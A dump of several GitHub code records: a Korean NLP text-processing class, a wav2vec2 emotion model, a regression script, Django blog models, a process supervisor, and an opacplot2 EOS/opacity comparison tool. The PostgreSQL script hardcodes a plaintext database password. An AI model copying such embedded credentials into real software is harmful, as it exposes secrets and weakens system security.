\n def remove_cnoun(self, remove_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for cnoun in cnoun_list:\n if cnoun not in remove_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def clear_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.cnoun_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_cnoun(self, cnoun):\n cnoun_list = self.get_cnoun()\n if cnoun in cnoun_list:\n return True\n else:\n return False\n \n def get_stopword(self):\n stopword_list = []\n f = open(self.stopword_path, encoding=\"utf-8\")\n for line in f:\n stopword_list.append(line.strip())\n f.close()\n return stopword_list\n \n def add_stopword(self, add_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for stopword in add_list:\n if stopword not in stopword_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def remove_stopword(self, remove_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for stopword in stopword_list:\n if stopword not in remove_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def clear_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.stopword_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_stopword(self, stopword):\n stopword_list = self.get_stopword()\n if stopword in stopword_list:\n return True\n else:\n return False\n \n def start_timer(self):\n self.start = time.time()\n self.lab = []\n \n def lab_timer(self):\n self.lab.append((len(self.lab)+1, round(time.time() - self.start, 4)))\n return self.lab\n \n '''\n def get_spacing(self, sentence):\n if len(sentence) < 195:\n sentence = spacing(sentence)\n return sentence\n '''\n \n def get_token_position(self, sentence_org, tag_list):\n content_ = sentence_org\n position = 0\n loc_list = []\n for word, pos in tag_list:\n loc = content_.find(word)\n if loc != -1:\n position += loc\n content_ = content_[loc:]\n start = position\n end = position + len(word)\n org_word = sentence_org[start:end]\n else:\n start = 0\n end = 0\n org_word = word\n loc_list.append((org_word, pos, (start, end)))\n return loc_list\n \n def language_detector(self, sentence):\n len_ko = len(re.sub(\"[^가-힇]\", \"\", sentence))\n len_en = len(re.sub(\"[^a-zA-Z]\", \"\", sentence))\n return \"ko\" if len_ko >= len_en else \"en\"\n\n def iteration_remover(self, sentence, replace_char=\".\"):\n pattern_list = [r'(.)\\1{5,}', r'(..)\\1{5,}', r'(...)\\1{5,}']\n for pattern in pattern_list:\n matcher= re.compile(pattern)\n iteration_term_list = [match.group() for match in matcher.finditer(sentence)]\n for iteration_term in iteration_term_list:\n sentence = sentence.replace(iteration_term, \n iteration_term[:pattern.count(\".\")] + replace_char*(len(iteration_term)-pattern.count(\".\")))\n return sentence\n \n def get_plain_text(self, sentence, pos_list=[], word_index=0, pos_index=1, tag_index=1, tag=True):\n plain_text_sentence = 
\"\"\n for token in sentence:\n if len(pos_list) > 0:\n if token[pos_index] in pos_list:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n else:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n return plain_text_sentence.strip()\n \n def replacer(self, sentence):\n patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n (r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would'),\n ]\n self.patterns = [(re.compile(regex), repl) for (regex, repl) in patterns]\n for (pattern, repl) in self.patterns:\n sentence = re.sub(pattern, repl, sentence)\n return sentence\n \n '''\n def masking(self, sentence, replace_char=\"*\", replace_char_pattern = \"\", ner_tag_list=[], model_path=\"\"):\n if model_path == \"\":\n ner = NamedEntityRecognizer()\n else:\n ner = NamedEntityRecognizer(model_path=model_path)\n ner_result = ner.parse(sentence)\n for word, ner_tag, loc in ner_result:\n if len(ner_tag_list) == 0 or ner_tag in ner_tag_list:\n if replace_char_pattern != \"\":\n masked_word = \"\"\n for w, r in zip(word, replace_char_pattern):\n if w == r or r == \"_\":\n masked_word += w\n elif r == replace_char:\n masked_word += r\n else:\n masked_word += w\n if len(word) > len(replace_char_pattern):\n masked_word += replace_char*len(word[len(replace_char_pattern):])\n sentence = sentence[:loc[0]] + masked_word + sentence[loc[1]:]\n else:\n sentence = sentence[:loc[0]] + replace_char*len(word) + sentence[loc[1]:]\n \n return sentence\n '''\n\n def sentence_splitter(self, paragraph):\n #sentence_list = self.kkma.sentences(paragraph)\n sentence_list = split_sentences(paragraph)\n return sentence_list\n \n","repo_name":"fingeredman/teanaps","sub_path":"nlp/Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"19"}
+{"seq_id":"33192152382","text":"class Point:\n\t'Represents a point in two-dimensional geometric coordinates'\n\tdef __init__(self, x=1, y=3):\n\t\t'''Initilies the position of...'''\n\t\tself.move(x, y)\n\tdef move(self, x, y):\n\t\t\"Move the point to a new location in 2D space.\"\n\t\tself.x = x\n\t\tself.y = y\n\tdef reset(self):\n\t\t\"\"\"Resets the points to 0,0\"\"\"\n\t\tself.move(0, 0)\np = Point(3,1)\nagain = True\nwhile(again):\n\tprint(p.x, p.y)\n\tp.move(p.x+1, p.y-3)\n\tif p.x > 100:\n\t\tagain = False\na = raw_input(\"Press Return Key To Exit...\")\n","repo_name":"brandann/GarbageCode","sub_path":"PYTHON/Examples/first_class.py","file_name":"first_class.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"43146580849","text":"from transformers.models.wav2vec2.modeling_wav2vec2 import Wav2Vec2PreTrainedModel, Wav2Vec2Model\nimport torch\nimport torch.nn as nn\n\n# Wav2vec model skeleton\nclass Wav2vec2SER(Wav2Vec2PreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n self.feat_extractor = Wav2Vec2Model(config)\n \n self.cls_layer = nn.Sequential(*[\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.hidden_size),\n nn.Tanh(),\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.num_labels)\n ]) \n self.init_weights()\n\n def forward(self, x):\n backbone_out = self.feat_extractor(x)\n logits = self.cls_layer(torch.mean(backbone_out[0], dim=1))\n return logits","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"models/wav2vec2.py","file_name":"wav2vec2.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14430074886","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# veri kumesini oku\nverikumesi = pd.read_csv(\"ds1.txt\",delimiter=\"\\t\")\n\nX = verikumesi.iloc[:,:-1].values\ny = verikumesi.iloc[:,1].values\n\n# veri kumesini egitim ve test olarak parcala\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n# dogrusal regresyon modeli\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# tahmin\ny_pred = regressor.predict(X_test)\n\n# veri gorsellestirme\nplt.scatter(X_train, y_train, color='red')\nplt.plot(X_test, y_pred, color='blue')\nplt.show()","repo_name":"ocatak-zz/ocatak.github.io","sub_path":"SIB552/01/src/linear_reg.py","file_name":"linear_reg.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"70392388524","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\nTEXT_LIMIT = 15 # Ограничение количтсве символов\n\n\nclass Group(models.Model):\n title = models.CharField('Имя группы', max_length=200)\n slug = models.SlugField(unique=True)\n description = models.TextField('Описание')\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста',\n )\n pub_date = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор',\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='Группа',\n help_text='Группа, к которой будет относиться пост',\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n help_text='Загрузите картинку',\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = 'Сообщение'\n verbose_name_plural = 'Сообщения'\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='Пост',\n help_text='Пост к которому оставлен комментарий',\n )\n author = models.ForeignKey(\n User,\n related_name='comments',\n verbose_name='Автор комментария',\n on_delete=models.CASCADE,\n )\n text = models.TextField(\n 'Комментарий',\n help_text='Напишите комментарий',\n )\n created = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-created']\n verbose_name = 'Комментарий'\n verbose_name_plural = 'Комментарии'\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n related_name='following',\n )\n\n def __str__(self):\n return f'{self.user} подписался на {self.author}'\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow',\n ),\n ]\n","repo_name":"iliya12321/Yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"14713296983","text":"import os\nimport time\nimport signal\nimport psutil\nfrom logger import Logger\nfrom process.process import Process\n\n\nclass Master:\n\n def __init__(self, child_process):\n self.__stop = False\n self.process = []\n self.logger = Logger(Master.__name__, 'musicdaemon')\n\n self.child_process = child_process\n self.num_process = len(self.child_process)\n\n def main(self):\n master_pid = os.getpid()\n self.logger.log(\"start\", \"Start Master, PID {0}\".format(master_pid))\n\n signal.signal(signal.SIGINT, self.stop)\n signal.signal(signal.SIGTERM, self.stop)\n\n process_class_index = 0\n for child_process_id in range(self.num_process):\n pid = os.fork()\n child_process = self.child_process[process_class_index]\n process_name = child_process.name\n process_class = child_process.process_class\n\n if pid == 0:\n process = Process(child_process.name)\n exit_code = process.main(process_class)\n exit(exit_code)\n else:\n self.logger.log(\"start\",\n \"Start {0} Process {1} Process-{2} PID {3}\".format(\n process_class.__name__, process_name, child_process_id, pid\n ))\n self.process.append({\"id\": child_process_id, \"pid\": pid, \"name\": process_name})\n\n process_class_index += 1\n\n while not self.__stop:\n # os.system(\"ps aux | awk '{ print $8 \" \" $2 }' | grep -w Z\")\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid'])\n for p in self.process:\n if pinfo['pid'] == p['pid']:\n # print(p['name'], proc.status())\n if proc.status() == \"zombie\":\n proc.kill()\n self.process.pop(self.process.index(p))\n # else:\n # print(p['name'], proc.status())\n except psutil.NoSuchProcess:\n pass\n if len(self.process) == 1 and self.process[0]['name'] == 'server':\n self.stop(signal.SIGINT, 0)\n time.sleep(1)\n\n self.logger.log(\"stop\", \"Stop Master, PID {0}\".format(os.getpid()))\n\n def stop(self, signum, frame):\n self.__stop = True\n self.logger.log(\"stop\", \"Receive Signal {0}\".format(signum))\n\n for process in self.process:\n self.logger.log(\"stop\",\n \"Send Signal {0} to {1} Process-{2} PID {3}\".format(\n signal.SIGTERM, process['name'], process['id'], process['pid']\n ))\n os.kill(process['pid'], signal.SIGTERM)\n os.kill(process['pid'], signal.SIGKILL)\n","repo_name":"whiteblue3/apoweroftrance-radio-system","sub_path":"musicdaemon/process/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2703321160","text":"import psycopg2\n\n\ndef bullk_insert_img_file(records):\n try:\n connection = psycopg2.connect(user = \"postgres\",\n password = \"Yash@171\",\n host = \"localhost\",\n port = \"5432\",\n database = \"File Handling\")\n\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS metadata_of_image_file\")\n cursor.execute(\"\"\"CREATE TABLE metadata_of_image_file(id SERIAL PRIMARY KEY,\n image_name VARCHAR(255),\n hash_value VARCHAR(255),\n model VARCHAR(255), \n date_time VARCHAR(255), \n image_size VARCHAR(255))\"\"\")\n # cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n sql_insert_query =\"\"\"INSERT INTO metadata_of_image_file (image_name,hash_value, model, date_time, image_size) \n VALUES(%s, %s, %s, %s, %s)\"\"\"\n # executemany() to insert multiple rows\n result = cursor.executemany(sql_insert_query, records)\n connection.commit()\n print(cursor.rowcount, \"Record inserted successfully into metadata of image files table\")\n\n except(Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into metadata of image file table {}\".format(error))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error while creating PostgreSQL table\", error)\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n","repo_name":"YashKalbande/ai-files-managment-software","sub_path":"ImgDatabase.py","file_name":"ImgDatabase.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"74454974444","text":"import opacplot2 as opp\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport periodictable as ptab\nimport scipy as sp\nplt.rcParams.update({'text.usetex': False})\n\ndef get_input_data():\n\n parser = argparse.ArgumentParser(\n description=\"This script is used to check error differences\"\n \"between two files.\")\n\n\n\n parser.add_argument('-v', '--verbose',\n action='store_const', const=True,\n help='Verbosity option.')\n\n\n parser.add_argument('input_1',\n action='store', type=str,\n help='Input file 1.')\n\n parser.add_argument('input_2',\n action='store', type=str,\n help='Input file 2.')\n\n parser.add_argument('-f', '--filetypes',\n action='store', type=str,\n help='Input filetypes.')\n\n parser.add_argument('--mpi_1',\n action='store', type=str,\n help='Mass per ion for file 1.')\n\n parser.add_argument('--mpi_2',\n action='store', type=str,\n help='Mass per ion for file 2.')\n\n parser.add_argument('--Znum_1',\n action='store', type=str,\n help='Atomic numbers for file 1.')\n\n parser.add_argument('--Znum_2',\n action='store', type=str,\n help='Atomic numbers for file 2.')\n\n parser.add_argument('--Xfracs_1',\n action='store', type=str,\n help='Number fractions for file 1.')\n\n parser.add_argument('--Xfracs_2',\n action='store', type=str,\n help='Number fractions for file 2.')\n\n parser.add_argument('--filters_1',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 1 (g/cm^3, eV).')\n\n parser.add_argument('--filters_2',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 2 (g/cm^3, eV).')\n\n parser.add_argument('-p','--plot',\n action='store_const',\n const=True, default=False)\n\n parser.add_argument('--writelog',\n action='store_const',\n const=True, default=False,\n help='Write error values to file.')\n\n parser.add_argument('--lin_grid',\n action='store_const',\n const=True, default=False,\n help='Linear values for interpolated grid.')\n\n parser.add_argument('--tabnum_1',\n action='store', type=str,\n help='Specify the SESAME table number for file 1.')\n\n parser.add_argument('--tabnum_2',\n action='store', type=str,\n help='Specify the SESAME table number for file 2.')\n\n args = parser.parse_args()\n\n # Get the relevant paths and filenames.\n path_in_1 = os.path.abspath(args.input_1)\n path_in_2 = os.path.abspath(args.input_2)\n\n basedir_1, fn_1 = os.path.split(path_in_1)\n basedir_2, fn_2 = os.path.split(path_in_2)\n\n # Split filename twice in case of MULTI files (.opr.gz, etc)\n basename_1 = os.path.splitext(os.path.splitext(fn_1)[0])[0]\n basename_2 = os.path.splitext(os.path.splitext(fn_2)[0])[0]\n\n # Create lists for filetypes.\n if args.filetypes is not None:\n args.filetypes = [typ for typ in args.filetypes.split(',')]\n\n if args.Znum_1 is not None:\n args.Znum_1 = [num for num in args.Znum_1.split(',')]\n if args.Znum_2 is not None:\n args.Znum_2 = [num for num in args.Znum_2.split(',')]\n\n # Convert mpis to float.\n if args.mpi_1 is not None:\n args.mpi_1 = float(args.mpi_1)\n if args.mpi_2 is not None:\n args.mpi_2 = float(args.mpi_2)\n\n # Convert xfracs to float list.\n if args.Xfracs_1 is not None:\n args.Xfracs_1 = [float(x) for x in args.Xfracs_1.split(',')]\n if args.Xfracs_2 is not None:\n args.Xfracs_2 = [float(x) for x in args.Xfracs_2.split(',')]\n\n # Set defaults for SESAME filters.\n if args.filters_1 is not None:\n args.filters_1 = [float(num) for num in 
args.filters_1.split(',')]\n else:\n args.filters_1 = [0., 0.,]\n if args.filters_2 is not None:\n args.filters_2 = [float(num) for num in args.filters_2.split(',')]\n else:\n args.filters_2 = [0., 0.,]\n\n # Convert tabnum into int.\n if args.tabnum_1 is not None:\n try:\n args.tabnum_1 = int(args.tabnum_1)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 1.')\n if args.tabnum_2 is not None:\n try:\n args.tabnum_2 = int(args.tabnum_2)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 2.')\n\n\n input_data = {'args':args,\n 'basename_1':basename_1,\n 'basename_2':basename_2,\n 'path_in_1':path_in_1,\n 'path_in_2':path_in_2,\n 'basedir_1':basedir_1,\n 'basedir_2':basedir_2,\n 'fn_1':fn_1,\n 'fn_2':fn_2}\n\n\n return input_data\n\ndef read_format_ext(args, f_1, f_2):\n # Try to read from the input file extension.\n ext_dict = {'.prp':'propaceos',\n '.eps':'multi',\n '.opp':'multi',\n '.opz':'multi',\n '.opr':'multi',\n '.mexport':'sesame-qeos',\n '.ses':'sesame',\n '.cn4':'ionmix'}\n\n # If the input file is compressed, choose the next extension.\n if os.path.splitext(f_1)[1] == '.gz':\n _, ext_1 = os.path.splitext(os.path.splitext(f_1)[0])\n else:\n _, ext_1 = os.path.splitext(f_1)\n\n if os.path.splitext(f_2)[1] == '.gz':\n _, ext_2 = os.path.splitext(os.path.splitext(f_2)[0])\n else:\n _, ext_2 = os.path.splitext(f_2)\n\n # Choose the correct input type based on extension and set args.input\n # accordingly.\n args.filetypes = []\n if ext_1 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_1]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_1))\n if ext_2 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_2]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_2))\n\nclass Formats_Read(object):\n \"\"\"\n Reads in a file and returns an object with useful attributes based on the\n corresponding opacplot2 object. This class also includes the naming\n conventions for each format.\n\n\n This procedure is preferred (although it is rather redundant with the\n rest of opacplot2) since it preserves the original structure of the\n opacplot2 object & all calculations & processing is done in this class\n alone. 
This way, the mechanisms are more transparent for error checking.\n\n\n Returns\n -------\n Formats_Read\n Formats_Read().data is the opacplot2 object corresponding to the input\n file.\n\n Formats_Read().ft is the filetype of the input file.\n\n Formats_Read().common_keys are the \"common dictionary style\" keys for\n opacplot2.\n \"\"\"\n\n # Names dictionaries.\n # Convert \"common dictionary style\" keys -> Format keys\n propaceos_names_dict = {'idens' : 'nion',\n 'temp' : 'temp',\n 'dens' : 'dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'eint',\n 'Uec_DT' : 'eele',\n 'Ui_DT' : 'eion',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'opp_mg' : 'opp_mg',\n 'opr_mg' : 'opr_mg',\n 'emp_mg' : 'emp_mg',\n 'opp_int' : 'opp_int',\n 'opr_int' : 'opr_int',\n 'emp_int' : 'emp_int',\n 'Znum' : 'Znum',\n 'Anum' : 'Anum',\n 'Xnum' : 'Xnum',\n 'Anum_prp': 'Anum_prp',\n 'groups' : 'groups',\n 'Zsymb' : 'Zsymb',\n 'BulkMod' : 'BulkMod',\n 'ElemNum' : 'ElemNum',\n 'Abar' : 'Abar',\n 'Zmax' : 'Zmax'}\n\n multi_names_dict = {'idens':'idens',\n 'temp':'temp',\n 'dens':'dens',\n 'Zf_DT':'zbar',\n 'opp_mg':'opp_mg',\n 'opr_mg':'opr_mg',\n 'Znum':'Znum',\n 'Anum':'Anum',\n 'Xnum':'Xnum',\n 'groups':'groups',\n 'Abar':'Abar',\n 'Zmax':'Zmax',\n 'emp_mg':'emp_mg'}\n\n sesame_names_dict = {'idens':'idens',\n 'temp':'ele_temps',\n 'dens':'ele_dens',\n 'Zf_DT':'zbar',\n 'Ut_DT':'total_eint',\n 'Uec_DT':'ele_eint',\n 'Ui_DT':'ioncc_eint',\n 'Pi_DT':'ioncc_pres',\n 'Pec_DT':'ele_pres',\n 'Znum':'Znum',\n 'Xnum':'Xnum',\n 'BulkMod':'bulkmod',\n 'Abar':'abar',\n 'Zmax':'zmax'}\n\n\n sesame_qeos_names_dict = {'idens' : 'idens',\n 'temp' : 'ele_temps',\n 'dens' : 'ele_dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'total_eint',\n 'Uec_DT' : 'ele_eint',\n 'Ui_DT' : 'ion_eint',\n 'Pi_DT' : 'ion_pres',\n 'Pec_DT' : 'ele_pres',\n 'Znum' : 'Znum',\n 'Xnum' : 'Xnum',\n 'BulkMod' : 'bulkmod',\n 'Abar' : 'abar',\n 'Zmax' : 'zmax'}\n\n\n ionmix_names_dict = {'Znum' : 'zvals',\n 'Xnum' : 'fracs',\n 'idens' : 'numDens',\n 'temp' : 'temps',\n 'Zf_DT' : 'zbar',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'Ui_DT' : 'eion',\n 'Uec_DT' : 'eele',\n 'groups' : 'opac_bounds',\n 'opr_mg' : 'rosseland',\n 'opp_mg' : 'planck_absorb',\n 'emp_mg' : 'planck_emiss'}\n\n # Inverted names: Convert format keys -> \"common dictionary style\" keys\n propaceos_names_dict_inv = {v:k for k, v\n in propaceos_names_dict.items()}\n multi_names_dict_inv = {v:k for k, v\n in multi_names_dict.items()}\n sesame_names_dict_inv = {v:k for k, v\n in sesame_names_dict.items()}\n sesame_qeos_names_dict_inv = {v:k for k, v\n in sesame_qeos_names_dict.items()}\n ionmix_names_dict_inv = {v:k for k, v\n in ionmix_names_dict.items()}\n\n def __init__(self, form, basedir, basename, path_in,\n mpi=None, znum=None, xnum=None,\n filters=[0.,0.], verbose=False, tabnum=None):\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Set attributes.\n self.form = form\n self.basedir = basedir\n self.basename = basename\n self.path_in = path_in\n self.mpi = mpi\n self.znum = znum\n self.filters = filters\n self.verbose = verbose\n self.xnum = xnum\n self.tabnum = tabnum\n\n # For SESAME, we need the hedp package to calculate zbar.\n need_hedp_list = ['sesame', 'sesame-qeos']\n if self.form in need_hedp_list:\n try:\n global hedp\n import hedp.eos\n except ImportError:\n raise ImportError('You need the hedp module. 
You can get it here: '\n                                 'https://github.com/luli/hedp.')\n\n        # Use handle_dict to create the eos_dict based on the input format.\n        try:\n            self.data = self.handle_dict[self.form]()\n            self.ft = self.form\n        except KeyError:\n            raise KeyError('{} is not a valid format name!'.format(self.form))\n\n    def set_handle_dict(self):\n        self.handle_dict = {'propaceos' : self.propaceos_read,\n                            'multi' : self.multi_read,\n                            'sesame' : self.sesame_read,\n                            'sesame-qeos' : self.sesame_qeos_read,\n                            'ionmix' : self.ionmix_read}\n\n    def propaceos_read(self):\n        # If we are unable to find the correct script for opg_propaceos\n        # we need to let the user know.\n        try:\n            import opacplot2.opg_propaceos\n            op = opp.opg_propaceos.OpgPropaceosAscii(self.path_in)\n            self.common_keys = [self.propaceos_names_dict_inv[key]\n                                for key in op.keys()\n                                if key in self.propaceos_names_dict_inv.keys()]\n            return op\n        except ImportError:\n            raise ImportError('You do not have the opg_propaceos script.')\n\n    def multi_read(self):\n        op = opp.OpgMulti.open_file(self.basedir, self.basename)\n\n        # Decide if we need Znum and Xnum; calculate Anum if it is not given.\n        if self.znum is None:\n            if 'Znum' in op:\n                self.znum = op['Znum']\n            else:\n                raise ValueError('Znum array should be provided!')\n        if type(self.znum) is int:\n            self.znum = [self.znum]\n        op['Znum'] = np.array(self.znum, dtype='int')\n        op['Anum'] = np.array([ptab.elements[el].mass for el in op['Znum']])\n        if self.xnum is None:\n            if len(self.znum) == 1:\n                op['Xnum'] = np.array([1.0])\n            else:\n                raise ValueError('Xnum array should be provided')\n        else:\n            op['Xnum'] = np.array(self.xnum)  # self.xnum, not the undefined name Xnum\n\n        # Setting more attributes.\n        op['Abar'] = np.sum(op['Xnum']*op['Anum'])\n        op['Zmax'] = np.sum(op['Xnum']*op['Znum'])\n        op['idens'] = op['dens']*opp.NA/op['Abar']\n        self.common_keys = [self.multi_names_dict_inv[key]\n                            for key in op.keys()\n                            if key in self.multi_names_dict_inv.keys()]\n        return op\n\n    def sesame_read(self):\n        # TODO Add options for single vs double\n        if self.verbose:\n            print('Opening up SESAME file {}...'.format(self.path_in))\n        # Try SINGLE precision and then DOUBLE if that doesn't work.\n        try:\n            op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n        except ValueError:\n            op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n        \n        # If there is more than one table, fail. Use sesame-extract\n        # to create a one-table file.\n        if len(op.data.keys()) > 1:\n            raise Warning('More than one material ID found. 
'\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n \n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n if self.verbose:\n print('Setting the atomic numbers...')\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ioncc'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=False)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_names_dict_inv.keys()]\n\n return op\n\n def sesame_qeos_read(self):\n raise Warning('QEOS-SESAME is not ready yet!')\n\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. 
